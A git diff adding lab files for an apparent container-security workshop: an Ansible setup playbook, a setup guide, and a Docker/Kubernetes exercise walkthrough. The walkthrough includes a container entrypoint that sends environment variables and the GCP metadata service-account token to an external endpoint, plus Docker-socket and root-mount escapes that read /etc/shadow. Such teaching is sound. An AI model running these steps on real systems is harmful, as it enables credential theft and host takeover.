new file mode 100644
index 0000000..c246684
--- /dev/null
+++ b/current/lab-ansible-setup.yml
@@ -0,0 +1,387 @@
+---
+- name: Setup localhost
+ hosts: localhost
+ gather_facts: false
+ vars:
+ kubectl_ver: "v1.31.4"
+ helm_ver: "v3.16.4"
+ kind_ver: "v0.27.0"
+ cosign_ver: "v2.4.1"
+ crane_ver: "v0.20.2"
+ syft_ver: "1.18.1"
+ grype_ver: "0.85.0"
+ tasks:
+ - name: Install Docker and other dependencies
+ ansible.builtin.apt:
+ pkg:
+ - docker.io
+ - etcd-client
+ - jq
+ - unzip
+ - python3-pip
+ - python3-venv
+ update_cache: true
+ become: true
+
+ - name: Install Python packages for reverse shell handler
+ ansible.builtin.pip:
+ name:
+ - twisted==24.10.0
+ - pyopenssl==24.3.0
+ - service_identity==24.2.0
+ state: present
+
+ - name: Add current user to Docker group
+ ansible.builtin.user:
+ name: "{{ lookup('env', 'USER') }}"
+ groups: docker
+ append: true
+ become: true
+
+ - name: Create a directory for downloads
+ ansible.builtin.file:
+ path: "/tmp/lab-setup"
+ state: directory
+ mode: '0755'
+ register: download
+
+ # --- ngrok ---
+ - name: Download ngrok
+ ansible.builtin.uri:
+ url: https://bin.equinox.io/c/bNyj1mQVY4c/ngrok-v3-stable-linux-amd64.tgz
+ dest: "{{ download.path }}/ngrok.tgz"
+ register: ngrok
+
+ - name: Extract ngrok
+ ansible.builtin.unarchive:
+ src: "{{ ngrok.path }}"
+ dest: "/usr/local/bin/"
+ become: true
+
+ # --- kubectl ---
+ - name: Download kubectl {{ kubectl_ver }}
+ ansible.builtin.uri:
+ url: "https://dl.k8s.io/release/{{ kubectl_ver }}/bin/linux/amd64/kubectl"
+ dest: "{{ download.path }}/kubectl"
+ register: kubectl
+
+ - name: Get file hash for kubectl
+ ansible.builtin.uri:
+ url: "https://dl.k8s.io/{{ kubectl_ver }}/bin/linux/amd64/kubectl.sha256"
+ return_content: true
+ register: kubectl_sha256
+
+ - name: Verify kubectl checksum
+ ansible.builtin.shell: |
+ set -o pipefail
+ echo "{{ kubectl_sha256.content | trim }} {{ kubectl.path }}" | sha256sum --check
+ args:
+ executable: /usr/bin/bash
+ register: cmd_output
+ failed_when:
+ - "'OK' not in cmd_output.stdout"
+ changed_when:
+ - "'OK' in cmd_output.stdout"
+
+ - name: Show download result
+ ansible.builtin.debug:
+ msg: "Download of {{ cmd_output.stdout }}"
+
+ - name: Copy kubectl to final location and set permissions
+ ansible.builtin.copy:
+ src: "{{ kubectl.path }}"
+ dest: "/usr/local/bin/kubectl"
+ owner: root
+ group: root
+ mode: "+x"
+ become: true
+
+ - name: Check if kubectl is installed
+ ansible.builtin.command: kubectl version --output=yaml
+ register: client
+ failed_when: client.rc > 1
+ changed_when:
+ - "'clientVersion' in client.stdout"
+
+ - name: Show kubectl client version
+ ansible.builtin.debug:
+ msg: "{{ client.stdout_lines }}"
+
+ # --- Helm ---
+ - name: Download helm {{ helm_ver }}
+ ansible.builtin.uri:
+ url: "https://get.helm.sh/helm-{{ helm_ver }}-linux-amd64.tar.gz"
+ dest: "{{ download.path }}/helm.tar.gz"
+ register: helm
+
+ - name: Get file hash for helm
+ ansible.builtin.uri:
+ url: "https://get.helm.sh/helm-{{ helm_ver }}-linux-amd64.tar.gz.sha256"
+ return_content: true
+ register: helm_sha256
+
+ - name: Verify helm checksum
+ ansible.builtin.shell: |
+ set -o pipefail
+ echo "{{ helm_sha256.content | trim }} {{ helm.path }}" | sha256sum --check
+ args:
+ executable: /usr/bin/bash
+ register: cmd_output
+ failed_when:
+ - "'OK' not in cmd_output.stdout"
+ changed_when:
+ - "'OK' in cmd_output.stdout"
+
+ - name: Extract helm
+ ansible.builtin.unarchive:
+ src: "{{ helm.path }}"
+ dest: "{{ download.path }}"
+
+ - name: Install helm
+ ansible.builtin.copy:
+ src: "{{ download.path }}/linux-amd64/helm"
+ dest: "/usr/local/bin/helm"
+ owner: root
+ group: root
+ mode: "+x"
+ become: true
+
+ # --- Helm repos (removed deprecated charts.helm.sh/stable) ---
+ - name: Add prometheus community helm repo
+ ansible.builtin.command: helm repo add prometheus-community https://prometheus-community.github.io/helm-charts
+ register: helm_repo
+ changed_when: "'added' in helm_repo.stdout"
+
+ - name: Add Grafana helm charts repo
+ ansible.builtin.command: helm repo add grafana https://grafana.github.io/helm-charts
+ register: helm_repo
+ changed_when: "'added' in helm_repo.stdout"
+
+ - name: Add Tracee helm charts repo
+ ansible.builtin.command: helm repo add aqua https://aquasecurity.github.io/helm-charts/
+ register: helm_repo
+ changed_when: "'added' in helm_repo.stdout"
+
+ - name: Add Falco helm charts repo
+ ansible.builtin.command: helm repo add falcosecurity https://falcosecurity.github.io/charts
+ register: helm_repo
+ changed_when: "'added' in helm_repo.stdout"
+
+ - name: Add Cilium (Tetragon) helm charts repo
+ ansible.builtin.command: helm repo add cilium https://helm.cilium.io/
+ register: helm_repo
+ changed_when: "'added' in helm_repo.stdout"
+
+ - name: Do helm repo update
+ ansible.builtin.command: helm repo update
+ register: helm_repo
+ changed_when: "'Update Complete' in helm_repo.stdout"
+
+ # --- kind ---
+ - name: Download kind {{ kind_ver }}
+ ansible.builtin.uri:
+ url: "https://kind.sigs.k8s.io/dl/{{ kind_ver }}/kind-linux-amd64"
+ dest: "{{ download.path }}/kind"
+ register: kind
+
+ - name: Copy kind to final location and set permissions
+ ansible.builtin.copy:
+ src: "{{ kind.path }}"
+ dest: "/usr/local/bin/kind"
+ owner: root
+ group: root
+ mode: "+x"
+ become: true
+
+ - name: Create kind autocomplete
+ ansible.builtin.shell: |
+ kind completion bash > {{ lookup('env', 'HOME') }}/.kind_completion
+ echo "source {{ lookup('env', 'HOME') }}/.kind_completion" >> {{ lookup('env', 'HOME') }}/.bashrc
+ args:
+ creates: "{{ lookup('env', 'HOME') }}/.kind_completion"
+
+ # --- cosign (Sigstore) ---
+ - name: Download cosign {{ cosign_ver }}
+ ansible.builtin.uri:
+ url: "https://github.com/sigstore/cosign/releases/download/{{ cosign_ver }}/cosign-linux-amd64"
+ dest: "{{ download.path }}/cosign"
+ register: cosign
+
+ - name: Install cosign
+ ansible.builtin.copy:
+ src: "{{ cosign.path }}"
+ dest: "/usr/local/bin/cosign"
+ owner: root
+ group: root
+ mode: "+x"
+ become: true
+
+ # --- crane (go-containerregistry) ---
+ - name: Download crane {{ crane_ver }}
+ ansible.builtin.uri:
+ url: "https://github.com/google/go-containerregistry/releases/download/{{ crane_ver }}/go-containerregistry_Linux_x86_64.tar.gz"
+ dest: "{{ download.path }}/crane.tar.gz"
+ register: crane_download
+
+ - name: Extract crane
+ ansible.builtin.unarchive:
+ src: "{{ crane_download.path }}"
+ dest: "{{ download.path }}"
+
+ - name: Install crane
+ ansible.builtin.copy:
+ src: "{{ download.path }}/crane"
+ dest: "/usr/local/bin/crane"
+ owner: root
+ group: root
+ mode: "+x"
+ become: true
+
+ # --- syft (SBOM generator) ---
+ - name: Install syft via install script
+ ansible.builtin.shell: |
+ curl -sSfL https://raw.githubusercontent.com/anchore/syft/main/install.sh | sh -s -- -b /usr/local/bin v{{ syft_ver }}
+ args:
+ creates: /usr/local/bin/syft
+ become: true
+
+ # --- grype (vulnerability scanner) ---
+ - name: Install grype via install script
+ ansible.builtin.shell: |
+ curl -sSfL https://raw.githubusercontent.com/anchore/grype/main/install.sh | sh -s -- -b /usr/local/bin v{{ grype_ver }}
+ args:
+ creates: /usr/local/bin/grype
+ become: true
+
+ # --- Download workshop files from repo ---
+ - name: Download kind lab configuration
+ ansible.builtin.uri:
+ url: https://raw.githubusercontent.com/lockfale/Malicious_Containers_Workshop/main/current/kind-lab-config.yaml
+ dest: "{{ playbook_dir }}/kind-lab-config.yaml"
+
+ - name: Download k8s cluster ansible playbook
+ ansible.builtin.uri:
+ url: https://raw.githubusercontent.com/lockfale/Malicious_Containers_Workshop/main/current/k8s-ansible-setup.yml
+ dest: "{{ playbook_dir }}/k8s-ansible-setup.yaml"
+
+ - name: Create k8s-manifest directory
+ ansible.builtin.file:
+ path: "{{ playbook_dir }}/k8s-manifests"
+ state: directory
+ mode: '0750'
+
+ - name: Download k8s clusterroles manifest
+ ansible.builtin.uri:
+ url: https://raw.githubusercontent.com/lockfale/Malicious_Containers_Workshop/main/current/k8s-manifests/clusterroles.yaml
+ dest: "{{ playbook_dir }}/k8s-manifests/clusterroles.yaml"
+
+ - name: Download k8s clusterrolebindings manifest
+ ansible.builtin.uri:
+ url: https://raw.githubusercontent.com/lockfale/Malicious_Containers_Workshop/main/current/k8s-manifests/clusterrolebindings.yaml
+ dest: "{{ playbook_dir }}/k8s-manifests/clusterrolebindings.yaml"
+
+ - name: Download k8s service accounts manifest
+ ansible.builtin.uri:
+ url: https://raw.githubusercontent.com/lockfale/Malicious_Containers_Workshop/main/current/k8s-manifests/serviceaccounts.yaml
+ dest: "{{ playbook_dir }}/k8s-manifests/serviceaccounts.yaml"
+
+ - name: Download k8s namespace manifest
+ ansible.builtin.uri:
+ url: https://raw.githubusercontent.com/lockfale/Malicious_Containers_Workshop/main/current/k8s-manifests/namespaces.yaml
+ dest: "{{ playbook_dir }}/k8s-manifests/namespaces.yaml"
+
+ - name: Download k8s deployments manifest
+ ansible.builtin.uri:
+ url: https://raw.githubusercontent.com/lockfale/Malicious_Containers_Workshop/main/current/k8s-manifests/deployments.yaml
+ dest: "{{ playbook_dir }}/k8s-manifests/deployments.yaml"
+
+ - name: Download k8s pods manifest
+ ansible.builtin.uri:
+ url: https://raw.githubusercontent.com/lockfale/Malicious_Containers_Workshop/main/current/k8s-manifests/pods.yaml
+ dest: "{{ playbook_dir }}/k8s-manifests/pods.yaml"
+
+ - name: Download k8s services manifest
+ ansible.builtin.uri:
+ url: https://raw.githubusercontent.com/lockfale/Malicious_Containers_Workshop/main/current/k8s-manifests/services.yaml
+ dest: "{{ playbook_dir }}/k8s-manifests/services.yaml"
+
+ - name: Download k8s roles manifest
+ ansible.builtin.uri:
+ url: https://raw.githubusercontent.com/lockfale/Malicious_Containers_Workshop/main/current/k8s-manifests/roles.yaml
+ dest: "{{ playbook_dir }}/k8s-manifests/roles.yaml"
+
+ - name: Download k8s rolebindings manifest
+ ansible.builtin.uri:
+ url: https://raw.githubusercontent.com/lockfale/Malicious_Containers_Workshop/main/current/k8s-manifests/rolebindings.yaml
+ dest: "{{ playbook_dir }}/k8s-manifests/rolebindings.yaml"
+
+ - name: Download k8s secrets manifest
+ ansible.builtin.uri:
+ url: https://raw.githubusercontent.com/lockfale/Malicious_Containers_Workshop/main/current/k8s-manifests/secrets.yaml
+ dest: "{{ playbook_dir }}/k8s-manifests/secrets.yaml"
+
+ - name: Download k8s evilpod manifest
+ ansible.builtin.uri:
+ url: https://raw.githubusercontent.com/lockfale/Malicious_Containers_Workshop/main/current/k8s-manifests/evilpod.yaml
+ dest: "{{ playbook_dir }}/k8s-manifests/evilpod.yaml"
+
+ - name: Download k8s attacker-pod manifest
+ ansible.builtin.uri:
+ url: https://raw.githubusercontent.com/lockfale/Malicious_Containers_Workshop/main/current/k8s-manifests/attacker-pod.yaml
+ dest: "{{ playbook_dir }}/k8s-manifests/attacker-pod.yaml"
+
+ - name: Download k8s nothingallowedpod manifest
+ ansible.builtin.uri:
+ url: https://raw.githubusercontent.com/lockfale/Malicious_Containers_Workshop/main/current/k8s-manifests/nothingallowedpod.yaml
+ dest: "{{ playbook_dir }}/k8s-manifests/nothingallowedpod.yaml"
+
+ - name: Download supply chain demo manifests
+ ansible.builtin.uri:
+ url: "https://raw.githubusercontent.com/lockfale/Malicious_Containers_Workshop/main/current/k8s-manifests/{{ item }}"
+ dest: "{{ playbook_dir }}/k8s-manifests/{{ item }}"
+ loop:
+ - supply-chain-demo.yaml
+ - imds-demo-pod.yaml
+ - network-policy-demo.yaml
+
+ - name: Create helm config directory
+ ansible.builtin.file:
+ path: "{{ playbook_dir }}/helm-config"
+ state: directory
+ mode: '0750'
+
+ - name: Download grafana helm config
+ ansible.builtin.uri:
+ url: https://raw.githubusercontent.com/lockfale/Malicious_Containers_Workshop/main/current/helm-config/grafana-config.yaml
+ dest: "{{ playbook_dir }}/helm-config/grafana-config.yaml"
+
+ - name: Download promtail helm config
+ ansible.builtin.uri:
+ url: https://raw.githubusercontent.com/lockfale/Malicious_Containers_Workshop/main/current/helm-config/promtail-config.yaml
+ dest: "{{ playbook_dir }}/helm-config/promtail-config.yaml"
+
+ - name: Create scripts directory
+ ansible.builtin.file:
+ path: "{{ playbook_dir }}/scripts"
+ state: directory
+ mode: '0750'
+
+ - name: Download reverse shell handler
+ ansible.builtin.uri:
+ url: https://raw.githubusercontent.com/lockfale/Malicious_Containers_Workshop/main/current/scripts/reverse_shell_handler.py
+ dest: "{{ playbook_dir }}/scripts/reverse_shell_handler.py"
+
+ - name: Download verification script
+ ansible.builtin.uri:
+ url: https://raw.githubusercontent.com/lockfale/Malicious_Containers_Workshop/main/current/scripts/verify-setup.sh
+ dest: "{{ playbook_dir }}/scripts/verify-setup.sh"
+ mode: '0755'
+
+ - name: Clean up
+ ansible.builtin.file:
+ path: "/tmp/lab-setup"
+ state: absent
+
+ - name: Tell user to exit terminal and start a new one
+ ansible.builtin.debug:
+ msg: "Step 3 of setup finished, close this terminal and open a new one."
diff --git a/current/lab-setup.md b/current/lab-setup.md
new file mode 100644
index 0000000..9b72758
--- /dev/null
+++ b/current/lab-setup.md
@@ -0,0 +1,195 @@
+# Malicious Kubernetes Workshop - Lab Setup
+
+
+Welcome to the Malicious Kubernetes workshop. The following instructions will help you set up the lab environment. The K8s lab is built with `kind` (Kubernetes in Docker) for rapid prototyping and `ansible` for orchestration. It's not suitable for production usage, but it builds fast and reliably given our time constraints.
+
+If you have questions about running the lab on something other than GCP, see the [FAQ](#FAQ) at the end.
+
+**Time:** 5-10 mins including spinning dials
+
+## Prerequisites
+
+- A cloud VM (GCP recommended, AWS/Azure also work)
+- **OS:** Ubuntu 22.04 LTS
+- **Size:** e2-standard-2 (2 vCPU, 8GB RAM) or equivalent
+- SSH access to the VM
+
+## Tools Installed by Ansible
+
+| Tool | Version | Purpose |
+|------|---------|---------|
+| kubectl | v1.31.4 | Kubernetes CLI |
+| kind | v0.27.0 | Local K8s clusters |
+| Helm | v3.16.4 | K8s package manager |
+| cosign | v2.4.1 | Image signing (Sigstore) |
+| crane | v0.20.2 | Container registry tool |
+| syft | v1.18.1 | SBOM generation |
+| grype | v0.85.0 | Vulnerability scanning |
+| ngrok | v3 stable | Tunneling |
+| Docker | OS package | Container runtime |
+
+---
+
+**1. Create a new VM instance.** Select an e2-standard-2 for this session, so that you can run a large number of nodes and pods.
+This should come out to around the following cost per month: $51.92, or $0.07 cents an hour from your free credits you get by registering a new email address.
+ Goto: https://cloud.google.com/free
+ Create an account, or log in.
+
+
+**1a. Enable the compute API:**
+
+
+
+
+
+**1b. Configure the machine:**
+
+- **Machine type:** e2-standard-2
+- **Boot disk:** Ubuntu 22.04 LTS, 20 GB
+
+
+
+**1c. Configure the boot disk and image size.**
+
+
+
+**2. Connect to the instance over SSH.** GCloud has a nice web browser based SSH that will work fine for the lab:
+
+
+
+**3. Run the following setup commands:**
+
+```
+sudo apt update && sudo apt install -y python3-pip
+```
+
+```
+sudo pip install ansible
+```
+
+```
+curl -LO https://raw.githubusercontent.com/lockfale/Malicious_Containers_Workshop/main/current/lab-ansible-setup.yml
+```
+
+```
+ansible-playbook lab-ansible-setup.yml
+```
+
+**4. Start a new terminal** - then `exit` the existing one.
+
+ ```
+ kind version
+ ```
+
+ ```
+ kind create cluster --image=kindest/node:v1.31.4
+ ```
+
+
+**Note:** By default kind will pull an older version of Kubernetes, so the `--image` argument specifies the version we want.
+
+```
+kubectl version
+```
+
+```
+docker ps
+```
+
+```
+kind get clusters
+```
+
+
+```
+kind delete cluster
+```
+
+
+**5. Build Lab Cluster**
+
+ The ansible playbook downloaded a file for you:
+ ```
+ less kind-lab-config.yaml
+ ```
+
+ Note that the YAML file is annotated, so you can understand how it works.
+
+ Press ↓ and ↑ to scroll through file, and `q` to exit
+
+ Run the following command to setup the kind cluster
+
+ ```
+ kind create cluster --config=kind-lab-config.yaml
+ ```
+
+ This may take a couple of minutes, go get a coffee or something.
+
+ **6. Confirm lab is operational**
+
+ ```
+ kubectl cluster-info --context kind-lab
+ ```
+
+```
+kubectl get nodes
+```
+
+You should see 2 worker nodes and a control plane running.
+
+
+
+**7. Setup ngrok account**
+
+Sign up for a free ngrok account on https://ngrok.com, you can OAuth through the same Google Account if you want to keep it simple.
+
+You'll likely get redirected to a Setup & Installation page under Getting Started once you're signed in.
+
+Run the command under "Connect your account" in the terminal on your VM. You won't need to run the `unzip` command because we put it on with ansible already.
+
+
+
+Example: `ngrok config add-authtoken `
+
+Ngrok will be used for some exercises, so having this step completed ahead of time will be useful.
+
+You can check if ngrok is working with `ngrok http 80`.
+
+**8. Verify setup (optional)**
+
+Run the verification script to check all tools are installed correctly:
+```
+bash scripts/verify-setup.sh
+```
+
+**9. Do not turn off the VM after setup whilst waiting for the workshop. Otherwise you'll lose all the above (ephemeral storage).**
+
+
+**Troubleshooting note:**
+
+If you have an empty .kubeconfig file - your session was probably duplicated and not restarted after you installed kind. Make sure to exit your session and start a new one before continuing after the kind install.
+
+## Alternative Cloud Providers
+
+### AWS
+- Launch an EC2 instance: `t3.large` (2 vCPU, 8GB RAM)
+- AMI: Ubuntu 22.04 LTS
+- Security group: Allow inbound SSH (port 22)
+- The ansible playbook works the same way on AWS
+
+### Azure
+- Create a VM: `Standard_D2s_v3` (2 vCPU, 8GB RAM)
+- Image: Ubuntu 22.04 LTS
+- NSG: Allow inbound SSH (port 22)
+
+## FAQ
+
+**Can I just use my own local VM?**
+
+We discourage the use of local VMs during live workshops for several reasons. First, platform agnosticism — we want everyone to participate regardless of their OS/hardware. Second, bandwidth — downloading container images over shared wifi is slow and can cause issues for other students. Cloud VMs download images from the datacenter in seconds.
+
+After the workshop, you're welcome to run the lab setup on a local VM for personal use.
+
+**Can I just use my own favorite cloud provider?**
+
+If you want to use a provider other than GCP, go ahead at your own risk. The lab setup should work on any VM running Ubuntu 22.04 LTS. We recommend GCP during workshops for consistency, but AWS and Azure work fine too.
diff --git a/current/labs_walk_thru.md b/current/labs_walk_thru.md
new file mode 100644
index 0000000..efc04ef
--- /dev/null
+++ b/current/labs_walk_thru.md
@@ -0,0 +1,1962 @@
+# Labs Walk Thru
+**This is an accompanying file with the lab instructions and commands to help walk thru the labs. It's especially intended for use for those that have trouble copying and pasting from the slides, or prefer not to.**
+
+**If viewing on GitHub, you can navigate using the table of contents button in the top left next to the line count.**
+
+## Module 1 - Docker
+
+#### Slide 17 - Exercise - is this thing on?
+
+```
+docker --help
+```
+
+```
+docker run --help
+```
+
+#### Slide 18 - Troubleshoot (Docker health check)
+
+Is Docker reporting down or VM was stopped after setting up, try running these commands:
+
+```
+sudo apt install acl -y
+```
+```
+sudo systemctl status docker
+```
+Do this if status is not reporting up:
+
+```
+sudo systemctl restart docker
+```
+
+Create this ACL so you can run docker command without typing sudo everytime.
+```
+sudo setfacl -m user:$USER:rw /var/run/docker.sock
+```
+
+#### Slide 19 - Babby's first image
+```
+docker run hello-world
+```
+
+### Slide 20 - Single Command/Interactive Containers
+
+Running single command in a container
+```
+docker run alpine ip addr
+```
+
+Run an interactive session (shell) within a container (interactive termianl
+```
+docker run -it alpine /bin/ash
+```
+Type `exit` to exit the shell session in the container
+
+> -i, --interactive Keep STDIN open even if not attached
+>
+> -t, --tty Allocate a pseudo-TTY
+
+### Slide 21 - Interactive Containers (cont)
+
+List running containers?
+```
+docker ps
+```
+Where's the container, was it destroyed?
+```
+docker ps --all
+```
+
+Note: Replace \ below with the container id from the output of the above command.
+ - Tip: you usually only need the first few letters of the id for Docker to locate.
+
+```
+docker start
+```
+```
+docker ps
+```
+```
+docker attach
+```
+
+Note: exit once done
+```
+exit
+```
+
+### Slide 22 - Background a container
+
+```
+docker run -d nginx
+```
+
+```
+docker ps
+```
+
+```
+docker stop
+```
+
+Overide name commands (optional):
+```
+docker run --name webserver -d nginx
+```
+```
+docker container ls
+```
+
+### Slide 23 - Container Persistence
+
+```
+docker ps -a
+```
+
+### Slide 24 - Process Hierarchy
+
+```
+docker run -d nginx
+```
+```
+ps auxf
+```
+
+## Module 2 - Exploring Containers
+
+### Slide 27 - Where do images come from?
+
+```
+docker search nmap
+```
+
+### Slide 29 - Exercise: Exploring Images and Container History
+
+```
+docker run --name hist -it alpine /bin/ash
+```
+Inside the container shell run:
+```
+mkdir test && touch /test/Lorem
+```
+```
+exit
+```
+Back on the host run:
+```
+docker container diff hist
+```
+```
+docker container commit hist history_test
+```
+```
+docker image history history_test
+```
+
+### Slide 30 - Exercise: Exploring Container Images and History from DockerHub
+
+```
+docker search dropboxservice
+```
+
+### Slide 31 - Docker Image History
+
+```
+docker pull mkefi/dropboxservice:latest
+```
+
+```
+docker image ls
+```
+
+```
+docker history mkefi/dropboxservice
+```
+
+```
+docker history --no-trunc --format "{{.CreatedAt}}: {{.CreatedBy}}" mkefi/dropboxservice |less
+```
+
+> Use up and down arrow keys or `[SPACE]` to navigate, type `q` to quit
+
+### Slide 33 - Extract without running
+
+```
+docker create mkefi/dropboxservice
+```
+
+Note: Replace $container_id with Container ID returned by last command (only need first part)
+```
+docker cp $container_id:/dropboxservice.jar /tmp/app.jar
+```
+```
+ls /tmp/*.jar
+```
+```
+vim /tmp/app.jar
+```
+Remember `[ESC]` then `:q!` to exit from vim/view without saving
+
+Now that we've extracted the jar, we can remove the container. Use same container id from a few commands ago for command below.
+```
+docker rm $container_id
+```
+
+### Slide 34 - Optional, quick checks
+
+```
+file /tmp/app.jar
+```
+```
+mkdir /tmp/app
+```
+```
+unzip /tmp/app.jar -d /tmp/app/
+```
+```
+cat /tmp/app/META-INF/MANIFEST.MF
+```
+Note the start class
+```
+strings /tmp/app.jar |less
+```
+
+### Slide 35 - Going the distance - decompile (with docker!)
+
+```
+docker run -it --rm -v /tmp/:/mnt/ --user $(id -u):$(id -g) kwart/jd-cli /mnt/app.jar -od /mnt/app-decompiled
+```
+
+```
+ls /tmp/app-decompiled/
+```
+
+```
+less /tmp/app-decompiled/BOOT-INF/classes/application.yml
+```
+
+### Slide 36 - Manual Reversing (just another way of extracting files from an image)
+
+```
+cd ~ && mkdir testimage && cd testimage
+```
+```
+docker pull nginx
+```
+```
+docker save -o nginx.tar nginx
+```
+```
+tar -xvf nginx.tar
+```
+
+### Slide 37 - Manual Reversing cont.
+
+```
+cat /json | jq
+```
+
+### Slide 39 - Optional - Automated
+
+```
+sudo docker run -t --rm -v /var/run/docker.sock:/var/run/docker.sock:ro pegleg/whaler -sV=1.36 nginx:latest
+```
+```
+sudo docker run -t --rm -v /var/run/docker.sock:/var/run/docker.sock:ro pegleg/whaler -sV=1.36 mkefi/dropboxservice
+```
+
+### Slide 42 - Watch out: Exposing Services
+
+```
+docker run -d -p 8080:80 nginx
+```
+
+### Slide 43 - is nginx real?
+
+```
+docker image inspect nginx | jq
+```
+
+```
+docker trust inspect nginx | jq
+```
+
+## Module 3: Offensive Docker Techniques
+
+### ~~Slide 48 - Starting Tracee~~
+Skipping slide 48 content - its running automatically into grafana for you now. We will look in module 8!
+
+Start a new terminal window
+
+Run both of these commands in the new terminal window:
+
+```
+docker run --name tracee -d --rm --pid=host --cgroupns=host --privileged -v /etc/os-release:/etc/os-release-host:ro \
+-e LIBBPFGO_OSRELEASE_FILE=/etc/os-release-host aquasec/tracee:latest
+```
+
+
+```
+docker logs tracee --follow 2>&1 |grep MatchedPolicies
+```
+
+### Slide 49 - Create a Dockerfile
+
+Switch back to original window to run the following commands below:
+
+```
+cd ~ && mkdir imagetest && cd imagetest && vi Dockerfile
+```
+
+Note: Go to pipedream.com, create an account, and set up a new HTTP endpoint to receive requests
+
+### Slide 50 - Create a Dockerfile
+
+Paste the below contents into the vi after hitting `i` for insert
+```
+FROM ubuntu:22.04
+RUN groupadd -g 999 usertest && \
+useradd -r -u 999 -g usertest usertest
+RUN apt update && apt install -y curl tini
+COPY ./docker-entrypoint.sh /docker-entrypoint.sh
+RUN chmod +x docker-entrypoint.sh
+USER usertest
+# Go to pipedream.com and get an HTTP endpoint URL, replace below
+ENV URL PIPEDREAM_URL
+ENV UA "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.8.1.7) Gecko/20070917 BonEcho/2.0.0.7"
+# Replace HANDLE with your l33t hacker name or some other identifying designation
+ENV USER HANDLE
+# add a password
+ENV PW PASSWORD
+ENTRYPOINT ["/usr/bin/tini", "--", "/docker-entrypoint.sh"]
+```
+> After pasting, hit `[ESC]`, then type `:wq`
+
+
+### Slide 51 - Create an entrypoint script
+
+```
+vi docker-entrypoint.sh
+```
+
+### Slide 52 - Create an entrypoint script
+
+Paste the below script into the vi after hitting `i` for insert
+```
+#!/usr/bin/env bash
+
+if [ "shell" = "${1}" ]; then
+ /bin/bash
+else
+ while true
+ do
+ sleep 30
+ curl -s -X POST -A "${UA}" -H "X-User: ${USER}" -H "Cookie: `uname -a | gzip | base64 -w0`" -d \
+`{ env && curl -s -H 'Metadata-Flavor:Google' http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token; } | gzip | openssl enc -e -aes-256-cbc -md sha512 -pbkdf2 -salt -a -pass "pass:${PW}" | base64 -w0` \
+$URL
+ echo
+ done
+fi
+```
+> After pasting, hit `ESC`, then type `:wq`
+
+### Slide 53 - Build and run your image
+
+```
+docker build -t cmddemo .
+```
+
+```
+docker run --name demo -d cmddemo
+```
+
+```
+docker logs demo --follow 2>&1
+```
+
+
+### Slide 54 - Build and run your image (cont.)
+
+The trick to this one is pasting the contents of the cookie field in the request you received on Pipedream, into the base64 command below. This will decode it and pipe through gunzip to decompress the contents.
+```
+base64 -d <<< [cookie field content] | gunzip
+```
+
+>Take a look back at tracee terminal per slide 52
+
+### Slide 56 - Observing Docker
+
+```
+docker ps
+```
+Note name or id of running container and use it in command below
+```
+docker stop demo
+```
+
+```
+docker events
+```
+
+>Alternative to docker events command:
+>```
+>sudo ctr --address /var/run/containerd/containerd.sock events
+>```
+
+### Slide 58 - Working with external data / using Docker in your offensive toolkit
+
+```
+docker run --rm -it instrumentisto/nmap -A -T4 scanme.nmap.org
+```
+
+Where's the output? (optional)
+```
+mkdir ~/vol_test && cd ~/vol_test/
+```
+```
+docker run -v ~/vol_test:/output instrumentisto/nmap -sT -oA /output/test scanme.nmap.org
+```
+```
+ls -l ~/vol_test
+```
+```
+cat test.nmap
+```
+
+### Slide 60 - Docker with root or etc mounted as volume
+
+```
+docker run -it -v /:/host alpine /bin/ash
+```
+```
+cat /host/etc/shadow
+```
+```
+exit
+```
+
+### Slide 61 - Docker running privileged containers
+
+```
+docker run -it --privileged ubuntu /bin/bash
+```
+```
+apt update && apt-get install -y libcap2-bin
+```
+```
+capsh --print
+```
+```
+grep Cap /proc/self/status
+```
+```
+capsh --decode=0000003fffffffff
+```
+```
+exit
+```
+
+### Slide 62 - Exercise: Exposed Docker socket hijinx
+
+```
+docker run -it -v /var/run/docker.sock:/var/run/docker.sock ubuntu /bin/dash
+```
+
+```
+cd var/run/ && ls -l
+```
+
+```
+apt update && apt install -y curl socat
+```
+
+```
+echo '{"Image":"ubuntu","Cmd":["/bin/sh"],"DetachKeys":"Ctrl-p,Ctrl-q","OpenStdin":true,"Mounts":[{"Type":"bind","Source":"/etc/","Target":"/host_etc"}]}' > container.json
+```
+
+```
+curl -XPOST -H "Content-Type: application/json" --unix-socket /var/run/docker.sock -d "$(cat container.json)" http://localhost/containers/create
+```
+Make note of the first 4-5 characters of the ID returned, you'll need it in the next command.
+```
+curl -XPOST --unix-socket /var/run/docker.sock http://localhost/containers//start
+```
+
+### Slide 63 - Exposed docker socket hijinx (cont.)
+
+```
+socat - UNIX-CONNECT:/var/run/docker.sock
+```
+Make sure you do this carefully and be sure to put the container id in the POST url
+```
+POST /containers//attach?stream=1&stdin=1&stdout=1&stderr=1 HTTP/1.1
+Host:
+Connection: Upgrade
+Upgrade: tcp
+
+
+```
+After hitting enter twice, the socket should return an http status indicating the connection was upgraded.
+```
+ls
+```
+```
+cat /host_etc/shadow
+```
+
+### Slide 64 - Docker persistence
+
+```
+docker run -d --restart always nginx
+```
+
+
+## Module 4 - Container IR - GL,HF.
+
+### Slide 68 - Image CTF
+```
+docker image pull digitalshokunin/webserver
+```
+
+### Slide 75 - Clean ups
+
+```
+docker system df
+```
+
+```
+docker system prune
+```
+
+```
+docker container prune
+```
+
+## Module 5 - Kubernetes 101
+
+> No commands for this section
+
+## Module 6 - The Basics of using K8S
+
+### Slide 96 - Try out kubectl
+
+```
+kubectl get nodes
+```
+
+### Slide 97 - Namespaces
+
+```
+kubectl get namespaces
+```
+
+### Slide 98 - Creating a namespace
+
+```
+kubectl create namespace lab-namespace
+```
+
+```
+kubectl get namespaces
+```
+
+### Slide 101 - Accessing a cluster
+
+```
+kubectl cluster-info
+```
+
+### Slide 103 - Display pods
+
+```
+kubectl get pods
+```
+
+Specify namespace
+```
+kubectl get pods -n kube-system
+```
+
+All namespaces
+```
+kubectl get pods --all-namespaces
+```
+
+Describe (get more details) on a pod
+```
+kubectl -n kube-system describe pod
+```
+
+### Slide 105 - Babby's first pod
+
+```
+wget https://k8s.io/examples/pods/simple-pod.yaml
+```
+
+```
+kubectl apply -f simple-pod.yaml --namespace lab-namespace
+```
+
+```
+kubectl get pods
+```
+
+```
+kubectl get pods --namespace lab-namespace
+```
+
+```
+kubectl describe pod nginx --namespace lab-namespace
+```
+
+```
+kubectl get pod nginx --namespace lab-namespace
+```
+
+```
+kubectl get pod nginx -o wide --namespace lab-namespace
+```
+
+## Module 7 - Kubernetes Security
+
